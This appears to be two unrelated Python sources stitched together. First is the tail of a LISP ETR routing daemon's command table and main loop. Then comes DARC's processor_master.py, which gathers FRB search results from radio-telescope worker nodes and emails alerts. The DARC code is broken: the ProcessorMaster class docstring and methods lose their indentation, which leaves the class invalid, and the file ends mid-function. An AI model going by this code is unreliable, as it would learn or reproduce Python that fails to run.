        "ms-name" : [True],
        "instance-id" : [True, 0, 0xffffffff],
        "secondary-instance-id" : [True, 0, 0xffffffff],
        "eid-prefix" : [True],
        "group-prefix" : [True],
        "dynamic-eid" : [True, "yes", "no"],
        "signature-eid" : [True, "yes", "no"],
        "rloc" : [],
        "rloc-record-name" : [True],
        "elp-name" : [True],
        "geo-name" : [True],
        "rle-name" : [True],
        "json-name" : [True],
        "address" : [True],
        "interface" : [True],
        "priority" : [True, 0, 255],
        "weight" : [True, 0, 100] }],

    "lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
        "elp-name" : [False],
        "elp-node" : [],
        "address" : [True],
        "probe" : [True, "yes", "no"],
        "strict" : [True, "yes", "no"],
        "eid" : [True, "yes", "no"] }],

    "lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
        "rle-name" : [False],
        "rle-node" : [],
        "address" : [True],
        "level" : [True, 0, 255] }],

    "lisp geo-coordinates" : [lispconfig.lisp_geo_command, {
        "geo-name" : [False],
        "geo-tag" : [False] }],

    "lisp json" : [lispconfig.lisp_json_command, {
        "json-name" : [False],
        "json-string" : [False] }],

    "lisp group-mapping" : [lisp_group_mapping_command, {
        "group-name" : [False],
        "ms-name" : [True],
        "group-prefix" : [False],
        "instance-id" : [True, 0, 0xffffffff],
        "rle-address" : [False],
        "sources" : [],
        "address" : [True] }],

    "show database-mapping" : [lisp_etr_show_command, { }],
    "show etr-keys" : [lisp_etr_show_keys_command, {}],
    "show etr-dynamic-eid" : [lispconfig.lisp_show_dynamic_eid_command, { }]
}
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
# Main entry point: initialize the ETR process; exit non-zero on failure.
if (lisp_etr_startup() == False):
    lisp.lprint("lisp_etr_startup() failed")
    lisp.lisp_print_banner("ETR abnormal exit")
    exit(1)
#endif

# Sockets the main loop multiplexes on: ephemeral data/control socket and
# the internal IPC listen socket.
socket_list = [lisp_ephem_socket, lisp_ipc_listen_socket]

while (True):
    # A select() error (e.g. interrupted on shutdown) ends the main loop.
    try: ready_list, w, x = select.select(socket_list, [], [])
    except: break

    #
    # Process Info-Reply messages received on ephemeral port.
    #
    if (lisp_ephem_socket in ready_list):
        opcode, source, port, packet = \
            lisp.lisp_receive(lisp_ephem_socket, False)
        if (source == ""): break

        if (port == lisp.LISP_DATA_PORT):
            # Data-encapsulated packet arriving via NAT traversal.
            lisp_etr_nat_data_plane(lisp_raw_socket, packet, source)
        else:
            # RLOC-probes are handled by the pcap path, not here.
            if (lisp.lisp_is_rloc_probe_request(packet[0])):
                lisp.lprint("ETR ignoring RLOC-probe request, using pcap")
                continue
            #endif
            send_register = lisp.lisp_parse_packet(lisp_send_sockets, packet,
                source, port)

            #
            # Info-Reply from map-server has new RTR-list, trigger a
            # Map-Register and a Info-Request to the RTR.
            #
            if (send_register):
                lisp_etr_info_timer = threading.Timer(0,
                    lisp_etr_process_info_timer, [None])
                lisp_etr_info_timer.start()
                lisp_register_timer = threading.Timer(0,
                    lisp_process_register_timer, [lisp_send_sockets])
                lisp_register_timer.start()
            #endif
        #endif
    #endif

    #
    # Process either commands, an IPC data-packet (for testing), or any
    # protocol message on the IPC listen socket.
    #
    if (lisp_ipc_listen_socket in ready_list):
        opcode, source, port, packet = \
            lisp.lisp_receive(lisp_ipc_listen_socket, True)
        if (source == ""): break

        if (opcode == "command"):
            # Dispatch on the IPC message prefix.
            if (packet.find("learn%") != -1):
                lisp_etr_discover_eid(packet)
            elif (packet.find("nonce%") != -1):
                lisp_etr_process_nonce_ipc(packet)
            elif (packet.find("clear%") != -1):
                lispconfig.lisp_clear_decap_stats(packet)
            elif (packet.find("rtr%") != -1):
                lisp_etr_process_rtr_updown(packet)
            elif (packet.find("stats%") != -1):
                packet = packet.split("%")[-1]
                lisp.lisp_process_data_plane_decap_stats(packet, None)
            else:
                # Not a known IPC prefix, treat as a CLI command.
                lispconfig.lisp_process_command(lisp_ipc_listen_socket,
                    opcode, packet, "lisp-etr", [lisp_etr_commands])
            #endif
        elif (opcode == "api"):
            lisp.lisp_process_api("lisp-etr", lisp_ipc_listen_socket, packet)
        else:
            if (lisp.lisp_is_rloc_probe_request(packet[0])):
                lisp.lprint("ETR ignoring RLOC-probe request, using pcap")
                continue
            #endif
            lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
        #endif
    #endif
#endwhile

lisp_etr_shutdown()
lisp.lisp_print_banner("ETR normal exit")
exit(0)
#------------------------------------------------------------------------------
|
processor_master.py | #!/usr/bin/env python3
import os
import logging
import socket
import threading
from textwrap import dedent
import ast
import yaml
import multiprocessing as mp
import astropy.units as u
from astropy.coordinates import SkyCoord
from astropy.time import Time, TimeDelta
import numpy as np
from darc import DARCBase
from darc import util
from darc.control import send_command
from darc.definitions import WORKERS, TSAMP, TIME_UNIT
from darc.logger import get_queue_logger, get_queue_logger_listener
class ProcessorMasterManager(DARCBase):
    """
    Control logic for running several ProcessorMaster instances, one per observation
    """

    def __init__(self, *args, **kwargs):
        """
        Initialize the manager with a queue-based logger and empty
        per-observation bookkeeping.
        """
        # init DARCBase without logger, as we need a non-default logger
        super(ProcessorMasterManager, self).__init__(*args, no_logger=True, **kwargs)

        # initialize queue logger listener
        self.log_queue = mp.Queue()
        self.log_listener = get_queue_logger_listener(self.log_queue, self.log_file)
        self.log_listener.start()
        # create queue logger
        self.logger = get_queue_logger(self.module_name, self.log_queue)

        # per-taskid state: running ProcessorMaster, its command queue,
        # and the observation end time
        self.observations = {}
        self.observation_end_times = {}
        self.observation_queues = {}
        self.scavenger = None
        self.status_generator = None

        # reduce logging from status check commands
        logging.getLogger('darc.control').setLevel(logging.ERROR)

        self.logger.info("{} initialized".format(self.log_name))

    def run(self):
        """
        Main loop. Create thread scavenger, then run parent class run method
        """
        # create a thread scavenger
        self.scavenger = threading.Thread(target=self.thread_scavenger, name='scavenger')
        self.scavenger.start()
        # create a status generator for the processing website
        self.status_generator = threading.Thread(target=self.processing_status_generator, name='status_generator')
        self.status_generator.start()
        super(ProcessorMasterManager, self).run()

    def thread_scavenger(self):
        """
        Remove any finished threads at regular intervals
        """
        self.logger.info("Starting thread scavenger")
        while not self.stop_event.is_set():
            for taskid, thread in self.observations.copy().items():
                if not thread.is_alive():
                    # if the thread is dead, remove it from the list
                    self.logger.info(f"Scavenging thread of taskid {taskid}")
                    self.observations.pop(taskid)
                    self.observation_queues.pop(taskid)
                    # bugfix: the end time was never removed, so
                    # observation_end_times grew by one entry per observation
                    # for the lifetime of the manager
                    self.observation_end_times.pop(taskid, None)
            self.stop_event.wait(self.scavenger_interval)

    def processing_status_generator(self):
        """
        At regular interval, create status file for processing website
        """
        self.logger.info("Starting processing status file generator")
        # create the output directory if it does not exist
        util.makedirs(self.processing_status_path)
        hostname = socket.gethostname()
        out_file = os.path.join(self.processing_status_path, f"{hostname}.js")
        while not self.stop_event.is_set():
            # get list of taskids that are being processed
            taskids = sorted(self.observations.keys())
            times = []
            if not taskids:
                # nothing is running
                status = "idle"
            else:
                status = "running"
                now = Time.now()
                for taskid in taskids:
                    # check elapsed time
                    processing_time = now - self.observation_end_times[taskid]
                    # if negative, the observation is still running
                    if processing_time.sec < 0:
                        times.append('observing')
                    else:
                        # format as hh:mm:ss
                        full_min, seconds = divmod(processing_time.sec, 60)
                        hours, minutes = divmod(full_min, 60)
                        times.append(f"{hours:02.0f}h{minutes:02.0f}m{seconds:02.0f}s")
            content = dedent(f"""
                             var {hostname} = {{
                             "node_name": "{hostname}",
                             "node_status": "{status}",
                             "node_process": "{','.join(taskids)}",
                             "time": "{','.join(times)}"
                             }};
                             """)
            with open(out_file, 'w') as f:
                f.write(content)
            self.stop_event.wait(self.processing_status_generator_interval)
        # upon exit, create file to indicate node is offline
        content = dedent(f"""
                         var {hostname} = {{
                         "node_name": "{hostname}",
                         "node_status": "offline",
                         "node_process": "",
                         "time": ""
                         }};
                         """)
        with open(out_file, 'w') as f:
            f.write(content)
            f.flush()

    def stop(self, abort=False):
        """
        Stop this service

        :param bool abort: Ignored; a stop of the manager always equals an abort
        """
        self.logger.info("Stopping {}".format(self.log_name))
        # Abort any existing observations
        # loop over dictionary items. Use copy to avoid changing dict in loop
        for taskid, obs in self.observations.copy().items():
            if obs.is_alive():
                self.logger.info(f"Aborting observation with taskid {taskid}")
                self.observation_queues[taskid].put('abort')
                obs.join()
        # stop the log listener
        self.log_listener.stop()
        # stop the manager
        self.stop_event.set()
        # wait for subprocesses to exit
        if self.scavenger is not None:
            self.scavenger.join()
        if self.status_generator is not None:
            self.status_generator.join()

    def start_observation(self, obs_config, reload=True):
        """
        Initialize a ProcessorMaster and call its start_observation

        :param dict obs_config: Observation config
        :param bool reload: reload service settings (default: True)
        """
        if reload:
            self.load_config()

        # add parset to obs config
        obs_config['parset'] = self._load_parset(obs_config)
        # get task ID
        taskid = obs_config['parset']['task.taskID']

        self.logger.info(f"Starting observation with task ID {taskid}")

        # refuse to do anything if an observation with this task ID already exists
        if taskid in self.observations.keys():
            self.logger.error(f"Failed to start observation: task ID {taskid} already exists")
            return

        # initialize a Processor for this observation
        queue = mp.Queue()
        proc = ProcessorMaster(source_queue=queue, log_queue=self.log_queue, config_file=self.config_file)
        proc.name = taskid
        proc.start()
        # start the observation and store thread
        queue.put({'command': 'start_observation', 'obs_config': obs_config, 'reload': reload})
        self.observations[taskid] = proc
        self.observation_queues[taskid] = queue
        # end time = start packet (in units of TIME_UNIT since epoch) + duration
        self.observation_end_times[taskid] = Time(obs_config['startpacket'] / TIME_UNIT, format='unix') + \
            TimeDelta(obs_config['duration'], format='sec')
        return

    def stop_observation(self, obs_config):
        """
        Stop observation with task ID as given in parset

        :param dict obs_config: Observation config
        """
        # load the parset
        parset = self._load_parset(obs_config)
        # get task ID
        taskid = parset['task.taskID']
        # check if an observation with this task ID exists
        if taskid not in self.observations.keys():
            self.logger.error(f"Failed to stop observation: no such task ID {taskid}")
            return
        # signal the processor of this observation to stop the observation
        # when processing is finished, this also stops the Process
        self.observation_queues[taskid].put({'command': 'stop_observation'})

    def _load_parset(self, obs_config):
        """
        Load the observation parset

        :param dict obs_config: Observation config
        :return: parset as dict, or None if it could not be loaded
        """
        try:
            # encoded parset is already in config on master node
            # decode the parset
            raw_parset = util.decode_parset(obs_config['parset'])
            # convert to dict and store
            parset = util.parse_parset(raw_parset)
        except KeyError:
            self.logger.info("Observation parset not found in input config, looking for master parset")
            # Load the parset from the master parset file
            master_config_file = os.path.join(obs_config['master_dir'], 'parset', 'darc_master.parset')
            try:
                # Read raw config
                with open(master_config_file) as f:
                    master_config = f.read().strip()
                # Convert to dict
                master_config = util.parse_parset(master_config)
                # extract obs parset and decode
                raw_parset = util.decode_parset(master_config['parset'])
                parset = util.parse_parset(raw_parset)
            except Exception as e:
                self.logger.warning(
                    "Failed to load parset from master config file {}, "
                    "setting parset to None: {}".format(master_config_file, e))
                parset = None
        return parset
class ProcessorMaster(DARCBase):
"""
Combine results from worker node processors
"""
def __init__(self, log_queue, *args, **kwargs):
    """
    :param Queue log_queue: Queue to use for logging
    """
    # init DARCBase without logger, as we need a non-default logger
    super(ProcessorMaster, self).__init__(*args, no_logger=True, **kwargs)
    # create queue logger
    self.logger = get_queue_logger(self.module_name, log_queue)
    # read result dir from worker processor config
    self.result_dir = self._get_result_dir()

    # observation config, set by start_observation
    self.obs_config = None
    # nodes a warning email has already been sent for (one warning per node)
    self.warnings_sent = []
    # human-readable processing stage, used in error reporting
    self.status = None
    # thread running _process_observation
    self.process = None
    # result_dir plus observation-specific subdirectories
    self.central_result_dir = None

    self.logger.info("{} initialized".format(self.log_name))
def start_observation(self, obs_config, reload=True):
    """
    Parse obs config and start observation processing after end time has passed

    :param dict obs_config: Observation configuration
    :param bool reload: reload service settings (default: True)
    """
    # reload config
    if reload:
        self.load_config()

    # add observation-specific path to result_dir
    self.central_result_dir = os.path.join(self.result_dir, obs_config['date'], obs_config['datetimesource'])
    util.makedirs(self.central_result_dir)

    self.obs_config = obs_config

    # process the observation in a separate thread (not a process, as then we can't stop it directly
    # through the stop event of ProcessorMaster; and no other processing happens anyway)
    self.process = threading.Thread(target=self._process_observation)
    self.process.start()
def _process_observation(self):
    """
    Process observation: wait for the observation to end, then gather and
    publish the per-node results. Each stage checks the stop event so an
    abort terminates promptly; self.status tracks the current stage for
    error reporting.
    """
    # wait until the observation finishes
    start_processing_time = Time(self.obs_config['parset']['task.stopTime'])
    self.logger.info("Sleeping until {}".format(start_processing_time.iso))
    self.status = 'Observation in progress'
    util.sleepuntil_utc(start_processing_time, event=self.stop_event)
    if self.stop_event.is_set():
        return
    try:
        # generate observation info files
        self.status = 'Generating observation info files'
        info, coordinates = self._generate_info_file()
        if self.stop_event.is_set():
            return
        # wait for all result files to be present
        self.status = 'Waiting for nodes to finish processing'
        self._wait_for_workers()
        if self.stop_event.is_set():
            return
        # combine results, copy to website and generate email
        self.status = 'Combining node results'
        email, attachments = self._process_results(info, coordinates)
        if self.stop_event.is_set():
            return
        # publish results on web link and send email
        self.status = 'Sending results to website'
        self._publish_results(email, attachments)
        self.status = 'Sending results to email'
        self._send_email(email, attachments)
        self.status = 'Done'
    except Exception as e:
        self.logger.error(f"Failed to process observation. Status = {self.status}: {type(e)}: {e}")
    else:
        self.logger.info(f"Finished processing observation: {self.obs_config['parset']['task.taskID']}: "
                         f"{self.obs_config['datetimesource']}")
    # stop this processor instance
    self.stop_event.set()
def stop_observation(self, abort=False):
    """
    Stop observation

    :param bool abort: Whether or not to abort the observation
    """
    processing_running = self.process is not None

    if abort and processing_running:
        # terminate the processing by setting the stop event (this will also stop the ProcessorMaster)
        self.stop_event.set()
        self.logger.info(f"Observation aborted: {self.obs_config['parset']['task.taskID']}: "
                         f"{self.obs_config['datetimesource']}")
        return

    if processing_running:
        # processing is running and not aborting: nothing to do, the
        # processing thread sets the stop event itself when done
        return

    # no processing is running, only stop the processor
    self.stop_event.set()
def stop(self, abort=None):
    """
    Stop this service

    :param bool abort: Ignored, a stop of the service always equals abort
    """
    # bugfix: __init__ always sets obs_config (to None), so the previous
    # hasattr check was always true and subscripting None raised TypeError
    # when stop arrived before start_observation; check the value instead
    if getattr(self, 'obs_config', None) is not None:
        self.logger.info(f"ProcessorMaster for {self.obs_config['parset']['task.taskID']}: "
                         f"{self.obs_config['datetimesource']} received stop")
    else:
        self.logger.info("ProcessorMaster received stop")
    # abort observation, this also stops the ProcessorMaster
    self.stop_observation(abort=True)
def _get_result_dir(self):
    """
    Read the result directory from the worker processor section of the
    config file, expanding the {home} and {hostname} placeholders.
    """
    with open(self.config_file, 'r') as fh:
        processor_config = yaml.load(fh, Loader=yaml.SafeLoader)['processor']
    # substitutions for placeholders in the configured path
    substitutions = {'home': os.path.expanduser('~'),
                     'hostname': socket.gethostname()}
    return processor_config['result_dir'].format(**substitutions)
def _wait_for_workers(self):
    """
    Wait for all worker nodes to finish processing this observation.

    Blocks until a CB{beam}_summary.yaml file exists in the central result
    directory for every beam, or until the stop event is set. After
    max_wait_time, a warning email is sent once per node that appears
    offline while its result file is still missing.
    """
    obs = self.obs_config['datetimesource']
    self.logger.info(f"Waiting for workers to finish processing {obs}")
    # total waiting time; NOTE(review): accumulates across beams, so later
    # beams reach the warning threshold sooner — confirm this is intended
    twait = 0
    for beam in self.obs_config['beams']:
        # Log which beam we are waiting for
        self.logger.info(f"{obs} waiting for results from CB{beam:02d}")
        result_file = os.path.join(self.central_result_dir, f'CB{beam:02d}_summary.yaml')
        # wait until the result file is present
        while not os.path.isfile(result_file):
            # wait until the next check time
            self.stop_event.wait(self.check_interval)
            # abort if processing is stopped
            if self.stop_event.is_set():
                return
            twait += self.check_interval
            # if we waited a long time, check if a warning should be sent if the node is offline
            node = WORKERS[beam]
            if (twait > self.max_wait_time) and (not self._check_node_online(node)) and \
                    (node not in self.warnings_sent) and (not os.path.isfile(result_file)):
                self._send_warning(node)
                # store that we sent a warning
                self.warnings_sent.append(node)
def _check_node_online(self, node):
    """
    Check if the processor on a node is still online and processing the current observation

    :param str node: Hostname of node to check
    :return: status (bool): True if node is online, else False
    """
    # check if the processor on the node is online
    try:
        reply = send_command(self.node_timeout, 'processor', 'status', host=node)
        if reply is None:
            self.logger.debug(f"No reply received from {node}, assuming it is offline")
            return False
        status = reply['message']['processor']
    except Exception as e:
        self.logger.error(f"Failed to get {node} status: {type(e)}: {e}")
        status = ''
    if status != 'running':
        # processor is not running
        self.logger.debug(f"{node} processor is not running")
        return False
    # get list of running observations from node
    self.logger.debug(f"{node} is online, checking for observations")
    try:
        output = send_command(self.node_timeout, 'processor', 'get_attr observations',
                              host=node)['message']['processor']
        # parse the observation list
        # the list contains reference to processes, which should be put in quotes first
        output = ast.literal_eval(output.replace('<', '\'<').replace('>', '>\''))
        taskids = output['ProcessorManager.observations'].keys()
    except Exception as e:
        self.logger.error(f"Failed to get observation list from {node}: {type(e)}: {e}")
        return False
    self.logger.debug(f"{node} taskids: {taskids}")
    # check if the node is still processing the current taskid
    try:
        taskid = self.obs_config['parset']['task.taskID']
    except (KeyError, TypeError):
        # KeyError if parset or task.taskID are missing, TypeError if obs_config is None
        self.logger.error(f"Failed to get task ID of current master observation, assuming {node} is online")
        return True
    # idiom fix: return the membership test directly instead of the
    # if/else returning True/False
    return taskid in taskids
def _send_warning(self, node):
    """
    Send a warning email about a node

    :param str node: Node to send warning about
    """
    # get observation info from obs config
    try:
        date = self.obs_config['date']
        datetimesource = self.obs_config['datetimesource']
        taskid = self.obs_config['parset']['task.taskID']
    except (KeyError, TypeError):
        # KeyError if parset or task.taskID are missing, TypeError if obs_config is None
        self.logger.error(f"Failed to get parameters of current master observation, not sending warning email for "
                          f"{node}")
        return
    # generate email
    # node names end in the two-digit worker number; CB index is that number minus one
    beam = int(node[-2:]) - 1
    # NOTE(review): the inner <ul> in the "do the following" section below is
    # never closed (no </ul> before </p>) — most mail clients tolerate this,
    # but the HTML is malformed; confirm and fix in the template
    content = dedent(f"""
                     <html>
                     <title>DARC Warning</title>
                     <body>
                     <p>
                     <h3>Warning: DARC may be offline on {node}</h3><br />
                     DARC on {node} is either offline or no longer processing this observation:<br />
                     Task ID = {taskid}<br />
                     Name = {datetimesource}<br />
                     </p>
                     <p>
                     Please check:
                     <ul>
                     <li>Is DARC still online on {node}? See status website: http://arts041.apertif/~arts/darc/status
                     <li>Is DARC still processing on {node}?
                     <ul>
                     <li>Check the processing website: http://arts041.apertif/~arts/darc/processing
                     <li>Check the log file: <code>tail -n 50 /home/arts/darc/log/processor.{node}.log</code>
                     <li>Check if there are files in <code>/data2/output/{date}/{datetimesource}/triggers_realtime</code>
                     </ul>
                     </ul>
                     </p>
                     <p>
                     If DARC is not processing the observation, do the following:
                     <ul>
                     <li>Restart DARC on {node} (only if it is offline on the status webpage or you have other reason to suspect DARC is stuck): <code>ssh arts@{node} '. darc/venv/bin/activate && darc_kill_all; darc_start_all_services'</code>
                     <li>Create an empty output file for this observation: <code>touch /home/arts/darc/results/{date}/{datetimesource}/CB{beam:02d}_summary.yaml</code>
                     </p>
                     </body>
                     </html>
                     """)  # noqa - ignore max line length
    # set email subject with trigger time
    subject = f"DARC Warning: {node}"
    # get FQDN in way that actually adds the domain
    # simply socket.getfqdn does not actually do that on ARTS
    fqdn = socket.getaddrinfo(socket.gethostname(), None, 0, socket.SOCK_DGRAM, 0, socket.AI_CANONNAME)[0][3]
    frm = f"DARC Warning System <{os.getlogin()}@{fqdn}>"
    to = self.email_settings['to']
    body = {'type': 'html', 'content': content}
    # send
    self.logger.info(f"Sending {node} warning email")
    util.send_email(frm, to, subject, body)
def _process_results(self, info, coordinates):
    """
    Load statistics and plots from the nodes. Copy to website directory and return data to be sent as email

    :param dict info: Observation info summary
    :param dict coordinates: Coordinates of every CB in the observation
    :return: email (str), attachments (list)
    """
    self.logger.info(f"Processing results of {self.obs_config['datetimesource']}")
    notes = ""
    if self.obs_config['parset']['task.directionReferenceFrame'].upper() == 'HADEC':
        notes += "Reference frame is HADEC: RA/Dec coordinates are given for midpoint of observation.\n"
    # initialize email fields: trigger statistics, beam info, attachments
    beaminfo = ""
    triggers = []
    attachments = []
    missing_attachments = []
    missing_beams = []
    for beam in self.obs_config['beams']:
        # load the summary file
        with open(os.path.join(self.central_result_dir, f'CB{beam:02d}_summary.yaml')) as f:
            info_beam = yaml.load(f, Loader=yaml.SafeLoader)
        if info_beam is None:
            # summary file exists but is empty (e.g. created manually after
            # a node failure); report the beam with question marks
            self.logger.warning(f"Empty result file for CB{beam:02d}")
            # add to email with question marks
            beaminfo += "<tr><td>{beam:02d}</td>" \
                        "<td>?</td>" \
                        "<td>?</td>" \
                        "<td>?</td>" \
                        "<td>?</td></tr>".format(beam=beam)
            # add warning message
            missing_beams.append(f'CB{beam:02d}')
            continue
        beaminfo += "<tr><td>{beam:02d}</td>" \
                    "<td>{ncand_raw}</td>" \
                    "<td>{ncand_post_clustering}</td>" \
                    "<td>{ncand_post_thresholds}</td>" \
                    "<td>{ncand_post_classifier}</td></tr>".format(beam=beam, **info_beam)
        if info_beam['ncand_post_classifier'] > 0:
            # load the triggers
            try:
                triggers_beam = np.atleast_1d(np.genfromtxt(os.path.join(self.central_result_dir,
                                                                         f'CB{beam:02d}_triggers.txt'),
                                                            names=True, encoding=None))
                triggers.append(triggers_beam)
            except FileNotFoundError:
                self.logger.error(f"Missing trigger file for {self.obs_config['datetimesource']} CB{beam:02d}")
        # load attachment
        fname = os.path.join(self.central_result_dir, f'CB{beam:02d}.pdf')
        if not os.path.isfile(fname):
            missing_attachments.append(f'CB{beam:02d}')
        else:
            attachments.append({'path': fname, 'name': f'CB{beam:02d}.pdf', 'type': 'pdf'})
    if missing_beams:
        notes += f"Beams failed processing: {', '.join(missing_beams)}\n"
    if missing_attachments:
        notes += f"Missing PDF files for {', '.join(missing_attachments)}\n"
    # combine triggers from different CBs and sort by p, then by S/N
    if len(triggers) > 0:
        triggers = np.sort(np.concatenate(triggers), order=('p', 'snr'))[::-1]
    # save total number of triggers
    info['total_triggers'] = len(triggers)
    # create string of trigger info
    triggerinfo = ""
    ntrig = 0
    for trigger in triggers:
        # convert trigger to a dict usable for formatting
        trigger_dict = {}
        for key in triggers.dtype.names:
            trigger_dict[key] = trigger[key]
        # convert downsampling to width in ms
        trigger_dict['width'] = trigger['downsamp'] * TSAMP.to(u.ms).value
        triggerinfo += "<tr><td>{p:.2f}</td>" \
                       "<td>{snr:.2f}</td>" \
                       "<td>{dm:.2f}</td>" \
                       "<td>{time:.4f}</td>" \
                       "<td>{width:.4f}</td>" \
                       "<td>{cb:02.0f}</td>" \
                       "<td>{sb:02.0f}</td>".format(**trigger_dict)
        ntrig += 1
        # cap the number of triggers listed in the email
        if ntrig >= self.ntrig_email_max:
            triggerinfo += "<tr><td>truncated</td><td>truncated</td><td>truncated</td>" \
                           "<td>truncated</td><td>truncated</td><td>truncated</td>"
            break
    # format the coordinate list
    coordinfo = ""
    for beam in sorted(coordinates.keys()):
        # each beam contains list of RA, Dec, Gl, Gb
        coordinfo += "<tr><td>{:02d}</td><td>{}</td><td>{}</td>" \
                     "<td>{}</td><td>{}</td>".format(beam, *coordinates[beam])
    # format the notes
    if notes:
        notesinfo = '<th style="text-align:left" colspan="2">Notes</th>' \
                    '<td colspan="4">{}</td></tr>'.format(notes)
    else:
        notesinfo = ""
    # format deep search plot command
    try:
        # extract CB00 pointing in decimal degrees
        ra_hms, dec_dms = coordinates[0][:2]
        pointing = SkyCoord(ra_hms, dec_dms, unit=(u.hourangle, u.deg))
        date = ''.join(self.obs_config['datetimesource'].split('-')[:3])
        plot_cmd = f'python2 {self.plot_script} --ra {pointing.ra.deg:.6f} --dec {pointing.dec.deg:.6f} ' \
                   f'--date {date} --root {self.obs_config["datetimesource"]}'
    except KeyError:
        # no pointing found for CB00
        plot_cmd = 'Error: no CB00 pointing found'
        self.logger.error("Failed to generate deep search command: no CB00 pointing found")
    # add info strings to overall info
    info['beaminfo'] = beaminfo
    info['coordinfo'] = coordinfo
    info['triggerinfo'] = triggerinfo
    info['notes'] = notesinfo
    info['plot_cmd'] = plot_cmd
    # generate the full email html
    # using a second level dict here because str.format does not support keys containing a dot
    email = dedent("""
                   <html>
                   <head><title>FRB Alert System</title></head>
                   <body>
                   <p>
                   <table style="width:40%">
                   <tr>
                   <th style="text-align:left" colspan="2">UTC start</th>
                   <td colspan="4">{d[task.startTime]}</td>
                   </tr><tr>
                   <th style="text-align:left" colspan="2">Source</th>
                   <td colspan="4">{d[task.source.name]}</td>
                   </tr><tr>
                   <th style="text-align:left" colspan="2">Observation duration</th>
                   <td colspan="4">{d[task.duration]} s</td>
                   </tr><tr>
                   <th style="text-align:left" colspan="2">Task ID</th>
                   <td colspan="4">{d[task.taskID]}</td>
                   </tr><tr>
                   <th style="text-align:left" colspan="2">Classifier probability threshold (freq-time)</th>
                   <td colspan="4">{d[classifier_threshold_freqtime]:.2f}</td>
                   </tr><tr>
                   <th style="text-align:left" colspan="2">Classifier probability threshold (dm-time)</th>
                   <td colspan="4">{d[classifier_threshold_dmtime]:.2f}</td>
                   </tr><tr>
                   <th style="text-align:left" colspan="2">YMW16 DM (central beam)</th>
                   <td colspan="4">{d[ymw16]:.2f} pc cm<sup>-3</sup></td>
                   </tr><tr>
                   <th style="text-align:left" colspan="2">Used telescopes</th>
                   <td colspan="4">{d[task.telescopes]}</td>
                   </tr><tr>
                   <th style="text-align:left" colspan="2">Central frequency</th>
                   <td colspan="4">{d[freq]} MHz</td>
                   </tr><tr>
                   <th style="text-align:left" colspan="2">Total number of candidates</th>
                   <td colspan="4">{d[total_triggers]}</td>
                   </tr><tr>
                   <th style="text-align:left" colspan="2">Trigger web link</th>
                   <td colspan="4">{d[web_link]}</td>
                   </tr><tr>
                   <th style="text-align:left" colspan="2">Deep search command</th>
                   <td colspan="4">{d[plot_cmd]}</td>
                   </tr>{d[notes]}
                   </table>
                   </p>
                   <hr align="left" width="50%" />
                   <p><h2>Number of triggers per Compound Beam</h2><br />
                   <table style="width:50%">
                   <tr style="text-align:left">
                   <th>CB</th>
                   <th>AMBER</th>
                   <th>After grouping</th>
                   <th>After local S/N threshold</th>
                   <th>After classifier</th>
                   </tr>
                   {d[beaminfo]}
                   </table>
                   </p>
                   <hr align="left" width="50%" />
                   <p><h2>Compound Beam positions</h2><br />
                   <table style="width:50%">
                   <tr style="text-align:left">
                   <th>CB</th>
                   <th>RA (hms)</th>
                   <th>Dec (dms)</th>
                   <th>Gl (deg)</th>
                   <th>Gb (deg)</th>
                   </tr>
                   {d[coordinfo]}
                   </table>
                   </p>
                   <hr align="left" width="50%" />
                   <p><h2>FRB candidates</h2><br />
                   <table style="width:50%">
                   <tr style="text-align:left">
                   <th>Probability</th>
                   <th>S/N</th>
                   <th>DM (pc/cc)</th>
                   <th>Arrival time (s)</th>
                   <th>Width (ms)</th>
                   <th>CB</th>
                   <th>SB</th>
                   </tr>
                   {d[triggerinfo]}
                   </table>
                   </p>
                   </body>
                   </html>
                   """).format(d=info)
    return email, attachments
def _publish_results(self, body, files):
    """
    Publish email content as local website

    :param str body: HTML body to write to the web folder
    :param list files: attachment descriptors; each item's 'path' is symlinked
        into the web folder
    """
    # target directory inside the user's public_html tree
    target_dir = '{home}/public_html/darc/{webdir}/{date}/{datetimesource}'.format(webdir=self.webdir,
                                                                                   **self.obs_config)
    util.makedirs(target_dir)
    # write the body; the 'A' prefix keeps it at the top of a browser's directory listing
    info_path = os.path.join(target_dir, 'A_info.html')
    with open(info_path, 'w') as handle:
        handle.write(body)
    # Link each PDF into the web folder. The sources live outside public_html,
    # but remain readable as long as they are owned by the same user.
    # Replace any stale link left over from a previous run.
    for item in files:
        source_path = item['path']
        link_path = os.path.join(target_dir, os.path.basename(source_path))
        try:
            os.symlink(source_path, link_path)
        except FileExistsError:
            os.remove(link_path)
            os.symlink(source_path, link_path)
    self.logger.info(f"Published results of {self.obs_config['datetimesource']}")
def _send_email(self, email, attachments):
    """
    Send email with observation results

    :param str email: Email body (HTML)
    :param list attachments: Attachments
    """
    subject = f"ARTS FRB Alert System - {self.obs_config['datetimesource']}"
    # get FQDN in way that actually adds the domain
    # simply socket.getfqdn does not actually do that on ARTS
    fqdn = socket.getaddrinfo(socket.gethostname(), None, 0, socket.SOCK_DGRAM, 0, socket.AI_CANONNAME)[0][3]
    sender = f"ARTS FRB Alert System <{os.getlogin()}@{fqdn}>"
    recipient = self.email_settings['to']
    message_body = {'type': 'html', 'content': email}
    util.send_email(sender, recipient, subject, message_body, attachments)
    self.logger.info(f"Sent email for {self.obs_config['datetimesource']}")
def _generate_info_file(self):
    """
    Generate observation info files

    Writes two files into self.central_result_dir:
    - info.yaml: the observation parset augmented with frequency, YMW16 DM,
      start packet, classifier thresholds and the results web link
    - coordinates.txt: one line per compound beam with RA/Dec/Gl/Gb

    :return: info (dict), coordinates of each CB (dict)
    """
    # generate observation summary file
    fname = os.path.join(self.central_result_dir, 'info.yaml')
    # start with the observation parset
    parset = self.obs_config['parset']
    info = parset.copy()
    # format telescope list: strip the surrounding brackets from e.g. "[RT2, RT3]"
    info['task.telescopes'] = info['task.telescopes'].replace('[', '').replace(']', '')
    # Add central frequency
    info['freq'] = self.obs_config['freq']
    # Add YMW16 DM limit for CB00
    info['ymw16'] = util.get_ymw16(self.obs_config['parset'], 0, self.logger)
    # Add exact start time (startpacket)
    info['startpacket'] = self.obs_config['startpacket']
    # Add classifier probability thresholds, read from the service config file
    with open(self.config_file, 'r') as f:
        classifier_config = yaml.load(f, Loader=yaml.SafeLoader)['processor']['classifier']
    info['classifier_threshold_freqtime'] = classifier_config['thresh_freqtime']
    info['classifier_threshold_dmtime'] = classifier_config['thresh_dmtime']
    # add path to website
    # get FQDN in way that actually adds the domain
